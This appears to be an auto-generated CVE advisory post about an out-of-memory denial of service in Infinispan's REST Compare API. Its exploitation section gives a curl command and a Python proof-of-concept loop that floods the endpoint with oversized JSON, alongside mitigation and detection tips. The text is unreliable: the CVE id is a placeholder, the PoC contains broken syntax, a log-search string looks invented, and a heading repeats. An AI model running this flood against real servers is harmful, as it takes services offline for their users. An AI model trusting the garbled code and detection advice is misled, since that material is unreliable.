The vulnerability (CVE-2025-XXXX) in Infinispan’s REST Compare API allows an attacker to trigger an Out of Memory (OOM) error by sending repeated large POST requests. The API fails to properly handle buffer allocation and deallocation, leading to memory leaks. When malicious payloads are continuously processed, the system exhausts available memory, causing a denial of service. This affects Infinispan versions up to 15.0.5.Final and development builds like 15.1.0.Dev01.
DailyCVE Form:
Platform: Infinispan
Version: <= 15.0.5.Final
Vulnerability: OOM via REST API
Severity: Moderate
Date: Mar 28, 2025
What Undercode Say:
Exploitation:
curl -X POST http://target:11222/rest/compare -H "Content-Type: application/json" --data @large_payload.json
Repeatedly sending oversized JSON payloads exhausts memory.
Detection:
grep -r "BufferLeak" /var/log/infinispan/
Check logs for memory-related errors.
Mitigation:
- Limit REST request size:
<rest-server max-content-length="1048576"/>
- Upgrade when patches are available.
- Monitor memory usage:
jstat -gc <infinispan_pid>
Workaround:
Disable unused REST endpoints:
<rest-server enabled="false"/>
Exploit Code (PoC):
import requests
url = "http://target:11222/rest/compare"
headers = {"Content-Type": "application/json"}
data = '{"A": "' + "X" 1000000 + '"}'
while True:
requests.post(url, headers=headers, data=data)
Protection:
- Implement rate limiting.
- Use WAF to block oversized requests.
- Monitor heap usage with:
jcmd <pid> GC.heap_info
References:
References:
Reported By: https://github.com/advisories/GHSA-2q39-w2hw-2pjm
Extra Source Hub:
Undercode
